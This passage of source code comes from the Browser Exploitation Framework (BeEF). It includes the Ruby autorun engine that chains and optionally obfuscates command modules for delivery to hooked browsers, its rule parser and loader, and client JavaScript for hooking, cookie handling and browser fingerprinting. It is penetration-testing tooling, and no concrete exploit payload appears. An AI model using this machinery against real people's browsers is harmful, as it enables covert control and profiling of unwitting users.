mods_bodies.push(command_body)
mods_codes.push(cmd_mod['code'])
mods_conditions.push(cmd_mod['condition'])
end
# Depending on the chosen chain mode (sequential or nested/forward), prepare the appropriate wrapper
case chain_mode
when 'nested-forward'
wrapper = prepare_nested_forward_wrapper(mods_bodies, mods_codes, mods_conditions, execution_order, rule_token)
when 'sequential'
wrapper = prepare_sequential_wrapper(mods_bodies, execution_order, execution_delay, rule_token)
else
# we should never get here. chain mode is validated earlier.
print_error("[ARE] Invalid chain mode '#{chain_mode}'")
next
end
print_more "Triggering rules #{rule_ids} on HB #{hb_id}"
are_exec = BeEF::Core::Models::Execution.new(
session_id: hb_session,
mod_count: modules.length,
mod_successful: 0,
rule_token: rule_token,
mod_body: wrapper,
is_sent: false,
rule_id: rule_id
)
are_exec.save!
end
end
private
# Wraps module bodies in their own function, using setTimeout to trigger them with an eventual delay.
# Launch order is also taken care of.
# - sequential chain with delays (setTimeout stuff)
# ex.: setTimeout(module_one(), 0);
# setTimeout(module_two(), 2000);
# setTimeout(module_three(), 3000);
# Note: no result status is checked here!! Useful if you just want to launch a bunch of modules without caring
# what their status will be (for instance, a bunch of XSRFs on a set of targets)
def prepare_sequential_wrapper(mods, order, delay, rule_token)
wrapper = ''
delayed_exec = ''
c = 0
while c < mods.length
delayed_exec += %| setTimeout(function(){#{mods[order[c]][:mod_name]}_#{rule_token}();}, #{delay[c]}); |
mod_body = mods[order[c]][:mod_body].to_s.gsub("#{mods[order[c]][:mod_name]}_mod_output", "#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output")
wrapped_mod = "#{mod_body}\n"
wrapper += wrapped_mod
c += 1
end
wrapper += delayed_exec
print_more "Final Modules Wrapper:\n #{wrapper}" if @debug_on
wrapper
end
# Wraps module bodies in their own function, then start to execute them from the first, polling for
# command execution status/results (with configurable polling interval and timeout).
# Launch order is also taken care of.
# - nested forward chain with status checks (setInterval to wait for command to return from async operations)
# ex.: module_one()
# if condition
# module_two(module_one_output)
# if condition
# module_three(module_two_output)
#
# Note: command result status is checked, and you can properly chain input into output, having also
# the flexibility of slightly mangling it to adapt to module needs.
# Note: Useful in situations where you want to launch 2 modules, where the second one will execute only
# if the first once return with success. Also, the second module has the possibility of mangling first
# module output and use it as input for some of its module inputs.
def prepare_nested_forward_wrapper(mods, code, conditions, order, rule_token)
wrapper = ''
delayed_exec = ''
delayed_exec_footers = []
c = 0
while c < mods.length
i = if mods.length == 1
c
else
c + 1
end
code_snippet = ''
mod_input = ''
if code[c] != 'null' && code[c] != ''
code_snippet = code[c]
mod_input = 'mod_input'
end
conditions[i] = true if conditions[i].nil? || conditions[i] == ''
if c == 0
# this is the first wrapper to prepare
delayed_exec += %|
function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
#{mods[order[c]][:mod_name]}_#{rule_token}();
// TODO add timeout to prevent infinite loops
function isResReady(mod_result, start){
if (mod_result === null && parseInt(((new Date().getTime()) - start)) < #{@result_poll_timeout}){
// loop
}else{
// module return status/data is now available
clearInterval(resultReady);
if (mod_result === null && #{@continue_after_timeout}){
var mod_result = [];
mod_result[0] = 1; //unknown status
mod_result[1] = '' //empty result
}
var status = mod_result[0];
if(#{conditions[i]}){
#{mods[order[i]][:mod_name]}_#{rule_token}_can_exec = true;
#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output = mod_result[1];
|
delayed_exec_footer = %|
}
}
}
var start = (new Date()).getTime();
var resultReady = setInterval(function(){var start = (new Date()).getTime(); isResReady(#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output, start);},#{@result_poll_interval});
}
#{mods[order[c]][:mod_name]}_#{rule_token}_f();
|
delayed_exec_footers.push(delayed_exec_footer)
elsif c < mods.length - 1
code_snippet = code_snippet.to_s.gsub(mods[order[c - 1]][:mod_name], "#{mods[order[c - 1]][:mod_name]}_#{rule_token}")
# this is one of the wrappers in the middle of the chain
delayed_exec += %|
function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
if(#{mods[order[c]][:mod_name]}_#{rule_token}_can_exec){
#{code_snippet}
#{mods[order[c]][:mod_name]}_#{rule_token}(#{mod_input});
function isResReady(mod_result, start){
if (mod_result === null && parseInt(((new Date().getTime()) - start)) < #{@result_poll_timeout}){
// loop
}else{
// module return status/data is now available
clearInterval(resultReady);
if (mod_result === null && #{@continue_after_timeout}){
var mod_result = [];
mod_result[0] = 1; //unknown status
mod_result[1] = '' //empty result
}
var status = mod_result[0];
if(#{conditions[i]}){
#{mods[order[i]][:mod_name]}_#{rule_token}_can_exec = true;
#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output = mod_result[1];
|
delayed_exec_footer = %|
}
}
}
var start = (new Date()).getTime();
var resultReady = setInterval(function(){ isResReady(#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output, start);},#{@result_poll_interval});
}
}
#{mods[order[c]][:mod_name]}_#{rule_token}_f();
|
delayed_exec_footers.push(delayed_exec_footer)
else
code_snippet = code_snippet.to_s.gsub(mods[order[c - 1]][:mod_name], "#{mods[order[c - 1]][:mod_name]}_#{rule_token}")
# this is the last wrapper to prepare
delayed_exec += %|
function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
if(#{mods[order[c]][:mod_name]}_#{rule_token}_can_exec){
#{code_snippet}
#{mods[order[c]][:mod_name]}_#{rule_token}(#{mod_input});
}
}
#{mods[order[c]][:mod_name]}_#{rule_token}_f();
|
end
mod_body = mods[order[c]][:mod_body].to_s.gsub("#{mods[order[c]][:mod_name]}_mod_output", "#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output")
wrapped_mod = "#{mod_body}\n"
wrapper += wrapped_mod
c += 1
end
wrapper += delayed_exec + delayed_exec_footers.reverse.join("\n")
print_more "Final Modules Wrapper:\n #{delayed_exec + delayed_exec_footers.reverse.join("\n")}" if @debug_on
wrapper
end
# prepare the command module (compiling the Erubis templating stuff), eventually obfuscate it,
# and store it in the database.
# Returns the raw module body after template substitution.
def prepare_command(mod, options, hb_id, replace_input, rule_token)
config = BeEF::Core::Configuration.instance
begin
command = BeEF::Core::Models::Command.new(
data: options.to_json,
hooked_browser_id: hb_id,
command_module_id: BeEF::Core::Configuration.instance.get("beef.module.#{mod.name}.db.id"),
creationdate: Time.new.to_i,
instructions_sent: true
)
command.save!
command_module = BeEF::Core::Models::CommandModule.find(mod.id)
if command_module.path.match(/^Dynamic/)
# metasploit and similar integrations
command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
else
# normal modules always here
key = BeEF::Module.get_key_by_database_id(mod.id)
command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key)
end
hb = BeEF::HBManager.get_by_id(hb_id)
hb_session = hb.session
command_module.command_id = command.id
command_module.session_id = hb_session
command_module.build_datastore(command.data)
command_module.pre_send
build_missing_beefjs_components(command_module.beefjs_components) unless command_module.beefjs_components.empty?
if config.get('beef.extension.evasion.enable')
evasion = BeEF::Extension::Evasion::Evasion.instance
command_body = evasion.obfuscate(command_module.output) + "\n\n"
else
command_body = command_module.output + "\n\n"
end
# @note prints the event to the console
print_more "Preparing JS for command id [#{command.id}], module [#{mod.name}]"
mod_input = replace_input ? 'mod_input' : ''
result = %|
var #{mod.name}_#{rule_token} = function(#{mod_input}){
#{clean_command_body(command_body, replace_input)}
};
var #{mod.name}_#{rule_token}_can_exec = false;
var #{mod.name}_#{rule_token}_mod_output = null;
|
{ mod_name: mod.name, mod_body: result }
rescue StandardError => e
print_error e.message
print_debug e.backtrace.join("\n")
end
end
# Removes the beef.execute wrapper in order that modules are executed in the ARE wrapper, rather than
# using the default behavior of adding the module to an array and execute it at polling time.
#
# Also replace <<mod_input>> with mod_input variable if needed for chaining module output/input
def clean_command_body(command_body, replace_input)
cmd_body = command_body.lines.map(&:chomp)
wrapper_start_index, wrapper_end_index = nil
cmd_body.each_with_index do |line, index|
if line.to_s =~ /^(beef|[a-zA-Z]+)\.execute\(function\(\)/
wrapper_start_index = index
break
end
end
print_error '[ARE] Could not find module start index' if wrapper_start_index.nil?
cmd_body.reverse.each_with_index do |line, index|
if line.include?('});')
wrapper_end_index = index
break
end
end
print_error '[ARE] Could not find module end index' if wrapper_end_index.nil?
cleaned_cmd_body = cmd_body.slice(wrapper_start_index..-(wrapper_end_index + 1)).join("\n")
print_error '[ARE] No command to send' if cleaned_cmd_body.eql?('')
# check if <<mod_input>> should be replaced with a variable name (depending if the variable is a string or number)
return cleaned_cmd_body unless replace_input
if cleaned_cmd_body.include?('"<<mod_input>>"')
cleaned_cmd_body.gsub('"<<mod_input>>"', 'mod_input')
elsif cleaned_cmd_body.include?('\'<<mod_input>>\'')
cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
elsif cleaned_cmd_body.include?('<<mod_input>>')
cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
else
cleaned_cmd_body
end
rescue StandardError => e
print_error "[ARE] There is likely a problem with the module's command.js parsing. Check Engine.clean_command_body. #{e.message}"
end
# compare versions
def compare_versions(ver_a, cond, ver_b)
return true if cond == 'ALL'
return true if cond == '==' && ver_a == ver_b
return true if cond == '<=' && ver_a <= ver_b
return true if cond == '<' && ver_a < ver_b
return true if cond == '>=' && ver_a >= ver_b
return true if cond == '>' && ver_a > ver_b
false
end
end
end
end
end
================================================
FILE: core/main/autorun_engine/parser.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module AutorunEngine
class Parser
include Singleton
def initialize
@config = BeEF::Core::Configuration.instance
end
BROWSER = %w[FF C IE S O ALL]
OS = %w[Linux Windows OSX Android iOS BlackBerry ALL]
VERSION = ['<', '<=', '==', '>=', '>', 'ALL', 'Vista', 'XP']
CHAIN_MODE = %w[sequential nested-forward]
MAX_VER_LEN = 15
def parse(name, author, browser, browser_version, os, os_version, modules, execution_order, execution_delay, chain_mode)
raise ArgumentError, "Invalid rule name: #{name}" unless BeEF::Filters.is_non_empty_string?(name)
raise ArgumentError, "Invalid author name: #{author}" unless BeEF::Filters.is_non_empty_string?(author)
raise ArgumentError, "Invalid chain_mode definition: #{chain_mode}" unless CHAIN_MODE.include?(chain_mode)
raise ArgumentError, "Invalid os definition: #{os}" unless OS.include?(os)
unless modules.size == execution_delay.size
raise ArgumentError, "Number of execution_delay values (#{execution_delay.size}) must be consistent with number of modules (#{modules.size})"
end
execution_delay.each { |delay| raise TypeError, "Invalid execution_delay value: #{delay}. Values must be Integers." unless delay.is_a?(Integer) }
unless modules.size == execution_order.size
raise ArgumentError, "Number of execution_order values (#{execution_order.size}) must be consistent with number of modules (#{modules.size})"
end
execution_order.each { |order| raise TypeError, "Invalid execution_order value: #{order}. Values must be Integers." unless order.is_a?(Integer) }
# if multiple browsers were specified, check each browser
if browser.is_a?(Array)
browser.each do |b|
raise ArgumentError, "Invalid browser definition: #{browser}" unless BROWSER.include?(b)
end
# else, if only one browser was specified, check browser and browser version
else
raise ArgumentError, "Invalid browser definition: #{browser}" unless BROWSER.include?(browser)
if browser_version != 'ALL' && !(VERSION.include?(browser_version[0, 2].gsub(/\s+/, '')) &&
BeEF::Filters.is_valid_browserversion?(browser_version[2..-1].gsub(/\s+/, '')) && browser_version.length < MAX_VER_LEN)
raise ArgumentError, "Invalid browser_version definition: #{browser_version}"
end
end
if os_version != 'ALL' && !(VERSION.include?(os_version[0, 2].gsub(/\s+/, '')) &&
BeEF::Filters.is_valid_osversion?(os_version[2..-1].gsub(/\s+/, '')) && os_version.length < MAX_VER_LEN)
return ArgumentError, "Invalid os_version definition: #{os_version}"
end
# check if module names, conditions and options are ok
modules.each do |cmd_mod|
mod = BeEF::Core::Models::CommandModule.where(name: cmd_mod['name']).first
raise "The specified module name (#{cmd_mod['name']}) does not exist" if mod.nil?
modk = BeEF::Module.get_key_by_database_id(mod.id)
mod_options = BeEF::Module.get_options(modk)
opt_count = 0
mod_options.each do |opt|
if opt['name'] != cmd_mod['options'].keys[opt_count]
raise ArgumentError, "The specified option (#{cmd_mod['options'].keys[opt_count]}) for module (#{cmd_mod['name']}) was not specified"
end
opt_count += 1
end
end
true
end
end
end
end
end
================================================
FILE: core/main/autorun_engine/rule_loader.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module AutorunEngine
class RuleLoader
include Singleton
def initialize
@config = BeEF::Core::Configuration.instance
@debug_on = @config.get('beef.debug')
end
# Load an ARE rule set
# @param [Hash] ARE ruleset as JSON
# @return [Hash] {"success": Boolean, "rule_id": Integer, "error": String}
def load_rule_json(data)
name = data['name'] || ''
author = data['author'] || ''
browser = data['browser'] || 'ALL'
browser_version = data['browser_version'] || 'ALL'
os = data['os'] || 'ALL'
os_version = data['os_version'] || 'ALL'
modules = data['modules']
execution_order = data['execution_order']
execution_delay = data['execution_delay']
chain_mode = data['chain_mode'] || 'sequential'
begin
BeEF::Core::AutorunEngine::Parser.instance.parse(
name,
author,
browser,
browser_version,
os,
os_version,
modules,
execution_order,
execution_delay,
chain_mode
)
rescue => e
print_error("[ARE] Error loading ruleset (#{name}): #{e.message}")
return { 'success' => false, 'error' => e.message }
end
existing_rule = BeEF::Core::Models::Rule.where(
name: name,
author: author,
browser: browser,
browser_version: browser_version,
os: os,
os_version: os_version,
modules: modules.to_json,
execution_order: execution_order.to_s,
execution_delay: execution_delay.to_s,
chain_mode: chain_mode
).first
unless existing_rule.nil?
msg = "Duplicate rule already exists in the database (ID: #{existing_rule.id})"
print_info("[ARE] Skipping ruleset (#{name}): #{msg}")
return { 'success' => false, 'error' => msg }
end
are_rule = BeEF::Core::Models::Rule.new(
name: name,
author: author,
browser: browser,
browser_version: browser_version,
os: os,
os_version: os_version,
modules: modules.to_json,
execution_order: execution_order.to_s,
execution_delay: execution_delay.to_s,
chain_mode: chain_mode
)
are_rule.save
print_info("[ARE] Ruleset (#{name}) parsed and stored successfully.")
if @debug_on
print_more "Target Browser: #{browser} (#{browser_version})"
print_more "Target OS: #{os} (#{os_version})"
print_more 'Modules to run:'
modules.each do |mod|
print_more "(*) Name: #{mod['name']}"
print_more "(*) Condition: #{mod['condition']}"
print_more "(*) Code: #{mod['code']}"
print_more '(*) Options:'
mod['options'].each do |key, value|
print_more "\t#{key}: (#{value})"
end
end
print_more "Exec order: #{execution_order}"
print_more "Exec delay: #{exec_delay}"
end
{ 'success' => true, 'rule_id' => are_rule.id }
rescue TypeError, ArgumentError => e
print_error("[ARE] Failed to load ruleset (#{name}): #{e.message}")
{ 'success' => false, 'error' => e.message }
end
# Update an ARE rule set.
# @param [Hash] ARE rule ID.
# @param [Hash] ARE ruleset as JSON
# @return [Hash] {"success": Boolean, "rule_id": Integer, "error": String}
def update_rule_json(id, data)
# Quite similar in implementation to load_rule_json. Might benefit from a refactor.
name = data['name'] || ''
author = data['author'] || ''
browser = data['browser'] || 'ALL'
browser_version = data['browser_version'] || 'ALL'
os = data['os'] || 'ALL'
os_version = data['os_version'] || 'ALL'
modules = data['modules']
execution_order = data['execution_order']
execution_delay = data['execution_delay']
chain_mode = data['chain_mode'] || 'sequential'
begin
BeEF::Core::AutorunEngine::Parser.instance.parse(
name,
author,
browser,
browser_version,
os,
os_version,
modules,
execution_order,
execution_delay,
chain_mode
)
rescue => e
print_error("[ARE] Error updating ruleset (#{name}): #{e.message}")
return { 'success' => false, 'error' => e.message }
end
existing_rule = BeEF::Core::Models::Rule.where(
name: name,
author: author,
browser: browser,
browser_version: browser_version,
os: os,
os_version: os_version,
modules: modules.to_json,
execution_order: execution_order.to_s,
execution_delay: execution_delay.to_s,
chain_mode: chain_mode
).first
unless existing_rule.nil?
msg = "Duplicate rule already exists in the database (ID: #{existing_rule.id})"
print_info("[ARE] Skipping ruleset (#{name}): #{msg}")
return { 'success' => false, 'error' => msg }
end
old_are_rule = BeEF::Core::Models::Rule.find_by(id: id)
old_are_rule.update(
name: name,
author: author,
browser: browser,
browser_version: browser_version,
os: os,
os_version: os_version,
modules: modules.to_json,
execution_order: execution_order.to_s,
execution_delay: execution_delay.to_s,
chain_mode: chain_mode
)
print_info("[ARE] Ruleset (#{name}) updated successfully.")
if @debug_on
print_more "Target Browser: #{browser} (#{browser_version})"
print_more "Target OS: #{os} (#{os_version})"
print_more 'Modules to run:'
modules.each do |mod|
print_more "(*) Name: #{mod['name']}"
print_more "(*) Condition: #{mod['condition']}"
print_more "(*) Code: #{mod['code']}"
print_more '(*) Options:'
mod['options'].each do |key, value|
print_more "\t#{key}: (#{value})"
end
end
print_more "Exec order: #{execution_order}"
print_more "Exec delay: #{exec_delay}"
end
{ 'success' => true }
rescue TypeError, ArgumentError => e
print_error("[ARE] Failed to update ruleset (#{name}): #{e.message}")
{ 'success' => false, 'error' => e.message }
end
# Load an ARE ruleset from file
# @param [String] JSON ARE ruleset file path
def load_rule_file(json_rule_path)
rule_file = File.open(json_rule_path, 'r:UTF-8', &:read)
self.load_rule_json(JSON.parse(rule_file))
rescue => e
print_error("[ARE] Failed to load ruleset from #{json_rule_path}: #{e.message}")
end
# Load all JSON ARE rule files from arerules/enabled/ directory
def load_directory
Dir.glob("#{$root_dir}/arerules/enabled/**/*.json") do |rule_file|
print_debug("[ARE] Processing ruleset file: #{rule_file}")
load_rule_file(rule_file)
end
end
end
end
end
end
================================================
FILE: core/main/client/are.js
================================================
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* A series of functions that handle statuses, returns a number based on the function called.
* @namespace beef.are
*/
beef.are = {
/**
* A function for handling a success status
* @memberof beef.are
* @method status_success
* @return {number} 1
*/
status_success: function(){
return 1;
},
/**
* A function for handling an unknown status
* @memberof beef.are
* @method status_unknown
* @return {number} 0
*/
status_unknown: function(){
return 0;
},
/**
* A function for handling an error status
* @memberof beef.are
* @method status_error
* @return {number} -1
*/
status_error: function(){
return -1;
}
};
beef.regCmp("beef.are");
================================================
FILE: core/main/client/beef.js
================================================
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* BeEF JS Library <%= @beef_version %>
* Register the BeEF JS on the window object.
*/
$j = jQuery.noConflict();
if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
/**
* Register the BeEF JS on the window object.
* @namespace {Object} BeefJS
* @property {string} version BeEf Version
* @property {boolean} pageIsLoaded This gets set to true during window.onload(). It's a useful hack when messing with document.write().
* @property {array} onpopstate An array containing functions to be executed by the window.onpopstate() method.
* @property {array} onclose An array containing functions to be executed by the window.onclose() method.
* @property {array} commands An array containing functions to be executed by Beef.
* @property {array} components An array containing all the BeEF JS components.
*/
var BeefJS = {
version: '<%= @beef_version %>',
pageIsLoaded: false,
onpopstate: new Array(),
onclose: new Array(),
commands: new Array(),
components: new Array(),
/**
* Adds a function to display debug messages (wraps console.log())
* @param: {string} the debug string to return
*/
debug: function(msg) {
isDebug = '<%= @client_debug %>'
if (typeof console == "object" && typeof console.log == "function" && isDebug === 'true') {
var currentdate = new Date();
var pad = function(n){return ("0" + n).slice(-2);}
var datetime = currentdate.getFullYear() + "-"
+ pad(currentdate.getMonth()+1) + "-"
+ pad(currentdate.getDate()) + " "
+ pad(currentdate.getHours()) + ":"
+ pad(currentdate.getMinutes()) + ":"
+ pad(currentdate.getSeconds());
console.log('['+datetime+'] '+msg);
} else {
// TODO: maybe add a callback to BeEF server for debugging purposes
//window.alert(msg);
}
},
/**
* Adds a function to execute.
* @param: {Function} the function to execute.
*/
execute: function(fn) {
if ( typeof beef.websocket == "undefined"){
this.commands.push(fn);
}else{
fn();
}
},
/**
* Registers a component in BeEF JS.
* @params: {String} the component.
*
* Components are very important to register so the framework does not
* send them back over and over again.
*/
regCmp: function(component) {
this.components.push(component);
}
};
window.beef = BeefJS;
}
================================================
FILE: core/main/client/browser/cookie.js
================================================
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides fuctions for working with cookies.
* Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
* Original author unknown.
* @namespace beef.browser.cookie
*/
beef.browser.cookie = {
/** @memberof beef.browser.cookie */
setCookie: function (name, value, expires, path, domain, secure)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires )
{
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
( ( path ) ? ";path=" + path : "" ) +
( ( domain ) ? ";domain=" + domain : "" ) +
( ( secure ) ? ";secure" : "" );
},
/** @memberof beef.browser.cookie */
getCookie: function(name)
{
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
},
/** @memberof beef.browser.cookie */
deleteCookie: function (name, path, domain)
{
if ( this.getCookie(name) ) document.cookie = name + "=" +
( ( path ) ? ";path=" + path : "") +
( ( domain ) ? ";domain=" + domain : "" ) +
";expires=Thu, 01-Jan-1970 00:00:01 GMT";
},
/** @memberof beef.browser.cookie */
cookieValueRandomizer: function (){
var to_hell= '';
var min = 17;
var max = 25;
var lol_length = Math.floor(Math.random() * (max - min + 1)) + min;
var grunt = function(){
var moo = Math.floor(Math.random() * 62);
var char = '';
if(moo < 36){
char = String.fromCharCode(moo + 55);
}else{
char = String.fromCharCode(moo + 61);
}
if(char != ';' && char != '='){
return char;
}else{
return 'x';
}
};
while(to_hell.length < lol_length){
to_hell += grunt();
}
return to_hell;
},
/** @memberof beef.browser.cookie */
hasSessionCookies: function (name){
this.setCookie( name, beef.browser.cookie.cookieValueRandomizer(), '', '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
return cookiesEnabled;
},
/** @memberof beef.browser.cookie */
hasPersistentCookies: function (name){
this.setCookie( name, beef.browser.cookie.cookieValueRandomizer(), 1, '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
return cookiesEnabled;
}
};
beef.regCmp('beef.browser.cookie');
================================================
FILE: core/main/client/browser/popup.js
================================================
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides fuctions for working with cookies.
* Several functions adopted from http://davidwalsh.name/popup-block-javascript
* Original author unknown.
* @namespace beef.browser.popup
*/
beef.browser.popup = {
/** @memberof beef.browser.popup */
blocker_enabled: function ()
{
screenParams = beef.hardware.getScreenSize();
var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
if (popUp == null || typeof(popUp)=='undefined') {
return true;
} else {
popUp.close();
return false;
}
}
};
beef.regCmp('beef.browser.popup');
================================================
FILE: core/main/client/browser.js
================================================
//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Basic browser functions.
* @namespace beef.browser
*/
beef.browser = {
/**
* Returns the protocol.
* @example: beef.browser.getProtocol()
*/
getProtocol: function() {
return document.location.protocol;
},
/**
* Returns the user agent that the browser is claiming to be.
* @example: beef.browser.getBrowserReportedName()
*/
getBrowserReportedName: function () {
return navigator.userAgent;
},
/**
* Returns the underlying layout engine in use by the browser.
* @example: beef.browser.getBrowserEngine()
*/
getBrowserEngine: function() {
try {
var engine = platform.layout;
if (!!engine)
return engine;
} catch (e) {}
return 'unknown';
},
/**
* Returns true if Avant Browser.
* @example: beef.browser.isA()
*/
isA: function () {
return window.navigator.userAgent.match(/Avant TriCore/) != null;
},
/**
* Returns true if Iceweasel.
* @example: beef.browser.isIceweasel()
*/
isIceweasel: function () {
return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null;
},
/**
* Returns true if Midori.
* @example: beef.browser.isMidori()
*/
isMidori: function () {
return window.navigator.userAgent.match(/Midori\/\d+\.\d/) != null;
},
/**
* Returns true if Odyssey
* @example: beef.browser.isOdyssey()
*/
isOdyssey: function () {
return (window.navigator.userAgent.match(/Odyssey Web Browser/) != null && window.navigator.userAgent.match(/OWB\/\d+\.\d/) != null);
},
/**
* Returns true if Brave
* @example: beef.browser.isBrave()
*/
isBrave: function(){
return (window.navigator.userAgent.match(/brave\/\d+\.\d/) != null && window.navigator.userAgent.match(/Brave\/\d+\.\d/) != null);
},
/**
* Returns true if IE6.
* @example: beef.browser.isIE6()
*/
isIE6: function () {
return !window.XMLHttpRequest && !window.globalStorage;
},
/**
* Returns true if IE7.
* @example: beef.browser.isIE7()
*/
isIE7: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !window.globalStorage && !document.documentMode;
},
/**
* Returns true if IE8.
* @example: beef.browser.isIE8()
*/
isIE8: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance;
},
/**
* Returns true if IE9.
* @example: beef.browser.isIE9()
*/
isIE9: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints === "undefined";
},
/**
*
* Returns true if IE10.
* @example: beef.browser.isIE10()
*/
isIE10: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined";
},
/**
*
* Returns true if IE11.
* @example: beef.browser.isIE11()
*/
isIE11: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined" && typeof document.selection === "undefined" && typeof document.createStyleSheet === "undefined" && typeof window.createPopup === "undefined" && typeof window.XDomainRequest === "undefined";
},
/**
*
* Returns true if Edge.
* @example: beef.browser.isEdge()
*/
isEdge: function () {
return !beef.browser.isIE() && !!window.styleMedia && (/Edg\/\d+\.\d/.test(window.navigator.userAgent) || /Edge\/\d+\.\d/.test(window.navigator.userAgent));
},
/**
* Returns true if IE.
* @example: beef.browser.isIE()
*/
isIE: function () {
return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10() || this.isIE11();
},
/**
* Returns true if FF2.
* @example: beef.browser.isFF2()
*/
isFF2: function () {
return !!window.globalStorage && !window.postMessage;
},
/**
* Returns true if FF3.
* @example: beef.browser.isFF3()
*/
isFF3: function () {
return !!window.globalStorage && !!window.postMessage && !JSON.parse;
},
/**
* Returns true if FF3.5.
* @example: beef.browser.isFF3_5()
*/
isFF3_5: function () {
return !!window.globalStorage && !!JSON.parse && !window.FileReader;
},
/**
* Returns true if FF3.6.
* @example: beef.browser.isFF3_6()
*/
isFF3_6: function () {
return !!window.globalStorage && !!window.FileReader && !window.multitouchData && !window.history.replaceState;
},
/**
* Returns true if FF4.
* @example: beef.browser.isFF4()
*/
isFF4: function () {
return !!window.globalStorage && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/4\./) != null;
},
/**
* Returns true if FF5.
* @example: beef.browser.isFF5()
*/
isFF5: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/5\./) != null;
},
/**
* Returns true if FF6.
* @example: beef.browser.isFF6()
*/
isFF6: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/6\./) != null;
},
/**
* Returns true if FF7.
* @example: beef.browser.isFF7()
*/
isFF7: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/7\./) != null;
},
/**
* Returns true if FF8.
* @example: beef.browser.isFF8()
*/
isFF8: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/8\./) != null;
},
/**
* Returns true if FF9.
* @example: beef.browser.isFF9()
*/
isFF9: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/9\./) != null;
},
/**
* Returns true if FF10.
* @example: beef.browser.isFF10()
*/
isFF10: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null;
},
/**
* Returns true if FF11.
* @example: beef.browser.isFF11()
*/
isFF11: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null;
},
/**
* Returns true if FF12
* @example: beef.browser.isFF12()
*/
isFF12: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
},
/**
* Returns true if FF13
* @example: beef.browser.isFF13()
*/
isFF13: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null;
},
/**
* Returns true if FF14
* @example: beef.browser.isFF14()
*/
isFF14: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null;
},
/**
* Returns true if FF15
* @example: beef.browser.isFF15()
*/
isFF15: function () {
